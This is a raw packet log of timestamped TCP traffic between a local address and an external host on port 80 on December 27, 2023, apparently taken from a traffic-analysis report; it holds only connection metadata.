Dec 27, 2023 18:12:24.199183941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.199240923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.200030088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.200047016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.200093031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.200833082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.200851917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.200901031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.201704979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.201720953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.201764107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.202532053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.202547073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.202584982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.203361988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.203386068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.203438997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.204154015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.204169989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.204230070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.205033064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.205050945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.205110073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.205838919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.205853939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.206659079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.206676960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.206712008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.206733942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.207536936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.207552910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.207616091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.208372116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.208406925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.209192991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.209254026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.209274054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.209307909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.210068941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.210104942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.210225105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.210885048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.210910082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.211735964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.211796045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.211807013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.211841106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.212569952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.212587118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.213426113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.213440895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.213473082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.213500023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.214528084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.214544058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.214596987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.215255976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.215272903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.215328932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.215976954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.215993881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.216046095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.216773987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.216788054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.216821909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.217621088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.217636108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.217689037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.218539000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.218554974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.218604088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.219360113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.219378948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.219428062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.220196009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.220211029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.220258951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.221430063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.221445084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.221488953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.221822977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.221837997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.221879005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.222660065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.222672939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.222719908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.223608017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.223623037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.223676920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.224436998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.224452019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.224493980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.225213051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.225228071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.225264072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.226094007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.226106882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.226154089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.226859093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.226871967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.226921082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.227943897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.227956057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.227991104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.228914976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.228929043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.228976965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.229450941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.229464054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.229506969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.230261087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.230273962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.230312109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.231118917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.231153965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.231200933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.231976032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.231991053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.232032061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.232820034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.232851028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.233676910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.233690977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.233726978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.233750105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.234468937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.234491110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.234544039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.235348940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.235363007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.235414982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.236156940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.236180067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.236227989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.237046957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.237063885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.237102032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.237828016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.237859011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.238728046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.238743067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.238780975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.238812923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.239521027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.239533901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.239576101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.240346909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.240360022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.240401983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.244792938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.244812965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.244823933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.244837046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.244848013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.244858980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.244869947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.244884968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.244894028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.246161938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.246179104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.246234894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.246675968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.246687889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.246700048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.246711969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.246718884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.246738911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.246756077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.247880936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.247896910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.247951031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.248296022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.248311043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.248353004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.249072075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.249084949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.249125004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.249934912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.249994040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.250838041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.250848055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.250849962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.250885963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.251673937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.251687050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.251732111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.252454996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.252501011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.252566099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.254121065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.254133940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.254185915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.256059885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.256119013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.256143093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.256162882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.256174088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.256194115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.256427050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.256439924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.256701946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.256715059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.256742954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.256778955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.257565975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.257579088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.257626057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.258402109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.258460999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.258508921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.259207964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.259221077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.259254932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.260171890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.260184050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.260221958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.261064053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.261076927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.261755943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.261768103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.261801958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.262635946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.262648106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.262695074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.263389111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.263427019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.263470888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.264256001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.264267921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.264308929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.265105963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.265117884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.265212059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.265933037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.265963078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.266006947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.266819954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.266833067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.266884089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.267663002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.267676115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.267712116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.268470049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.268481970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.268528938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.269335032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.269346952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.269383907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.270184994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.270198107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.270231962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.271012068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.271024942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.271069050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.271852970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.271866083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.271905899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.272640944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.272654057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.272696018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.273500919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.273513079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.273561001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.274414062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.274451017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.274827957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.275216103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.275228024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.275269985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.276407003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.276418924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.276459932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.278599024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.278611898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.278654099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.280805111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.280883074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.280965090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.281019926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.281033993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.281044960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.281055927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.281063080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.281075001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.281084061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.281097889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.281100035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.281116009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.281135082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.282047987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.282061100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.282099962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.283778906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.283790112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.283843040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.284691095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.284703970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.284735918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.284750938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.285051107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.285104990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.285116911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.285151005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.285151958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.285181046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.285197973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.285949945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.285963058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.285988092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.286007881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.286959887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.286973000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.287019014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.287512064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.287553072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.287556887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.287587881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.288582087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.288623095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.288629055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.288670063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.289125919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.289139032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.289163113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.289179087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.289865017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.289877892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.289911032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.290638924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.290651083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.290683985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.290699959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.291419029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.291430950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.291462898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.292184114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.292196035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.292217016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.292232990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.292944908 CET	80	49738	5.42.65.125	192.168.2.4
